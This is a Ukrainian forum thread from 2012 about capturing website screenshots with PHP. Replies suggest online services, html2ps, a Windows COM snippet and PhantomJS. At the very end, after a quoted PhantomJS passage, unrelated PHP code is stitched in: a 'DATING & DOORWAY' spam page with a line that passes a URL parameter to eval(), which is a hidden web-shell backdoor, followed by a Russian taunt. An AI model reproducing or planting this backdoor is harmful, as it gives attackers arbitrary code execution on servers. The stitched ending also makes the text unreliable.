Тема: Скріншот сайту

Вітаю.
Маю питання. Як можна за допомогою php, зробити скріншот сайту?

2 Востаннє редагувалося Vo_Vik (04.10.2012 20:50:58)

Re: Скріншот сайту

Тобто скріншот? а чийого сайту? вашого чи іншого? Плюс ви бачите сторінку в браузері, для різних браузерів буде різний вигляд.

Якщо сайт чужий, то парсите, якщо свій то маєте код. Можна відправити той код з пдф заголовком і потім конвертувати pdf в любу картинку.

Або просто накласти той код на канвас.

3

Re: Скріншот сайту

Скріншоп за допомогою php ніяк не зробити. Взагалі це дуже складно. Простіше використати готові сервіси. Ось тут є список: http://snapcasa.com/#directory

Подякували: Адріян Ігорович1

4

Re: Скріншот сайту

http://www.tufat.com/s_html2ps_html2pdf.htm - оце зберігає в ps, який потім можна зберегти в png

5

Re: Скріншот сайту

Якщо сайт чужий, то парсите, якщо свій то маєте код. Можна відправити той код з пдф заголовком і потім конвертувати pdf в любу картинку.

У будь якому випадку це не можливо зробити нормально. якщо у вас проста хтмл сторінка без всяких аяксів то так це буде нормальний скріншот. Якщо ж у вас сторінка на якій є динамічні елементи тоді захопити їх буде дууже важко.

6

Re: Скріншот сайту

Якщо сайт чужий, то парсите, якщо свій то маєте код. Можна відправити той код з пдф заголовком і потім конвертувати pdf в любу картинку.

У будь якому випадку це не можливо зробити нормально. якщо у вас проста хтмл сторінка без всяких аяксів то так це буде нормальний скріншот. Якщо ж у вас сторінка на якій є динамічні елементи тоді захопити їх буде дууже важко.

Re: Скріншот сайту

Replace написав:

Скріншоп за допомогою php ніяк не зробити. Взагалі це дуже складно. Простіше використати готові сервіси. Ось тут є список: http://snapcasa.com/#directory

Дякую, буду пробувати юзати screenshotmachine.com, там і api є для роботи.

8

Re: Скріншот сайту

не проверял, но попробуй

<?php 
$browser = new COM("InternetExplorer.Application"); 
$handle = $browser->HWND; 
$browser->Visible = true; 
$browser->Navigate("http://ya.ru"); 
while ($browser->Busy) { 
com_message_pump(4000); 
} 
$im = imagegrabwindow($handle, 0); 
$browser->Quit(); 
imagepng($im, "iesnap.png"); 
?>

9 Востаннє редагувалося Адріян Ігорович (15.11.2012 21:07:23)

Re: Скріншот сайту

vk.win32, наскільки я зрозумів, це може працювати лише під серваками, які стоять на windows.

10

Re: Скріншот сайту

Знайшов досить цікавий сервіс по створенню скріншотів сайту.
Можна вказувати розмір(але великі зображення чомусь робити не хоче) і без всяких там реєстрацій і тд тп можна отримати скріншот сайту.
Кому потрібно, пишіть у приват, скину лінк.

Подякували: Replace1

11

Re: Скріншот сайту

Кидайте сюди лінк думаю не тільки мені буде цікаво побачити цей сервіс ;)

12

Re: Скріншот сайту

funivan написав:

Кидайте сюди лінк думаю не тільки мені буде цікаво побачити цей сервіс ;)

Це навіть не зовсім сервіс, але все ж..

http://85.25.9.83/artviper.php?url=http://replace.org.ua/&w=200&h=150&sdx=1024&sdy=768&q=90&userID=blablabla
Подякували: Vo_Vik1

13

Re: Скріншот сайту

Траба буде при нагоді глянути)

14

Re: Скріншот сайту

У статті 10 things you didn't know JavaScript could do, пункт 10 написано що за допомогою  PhantomJS можна таке зробити. Цитата

But testing your JavaScript and DOM isn't the only use case for Phantom. What really fascinates me are its capabilities to scrape websites and to let you take screenshots of it! Yeah, you're reading right, with Phantom you can output webpages in different graphical formats and, of course, it's as easy as stealing sweets from a baby.

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!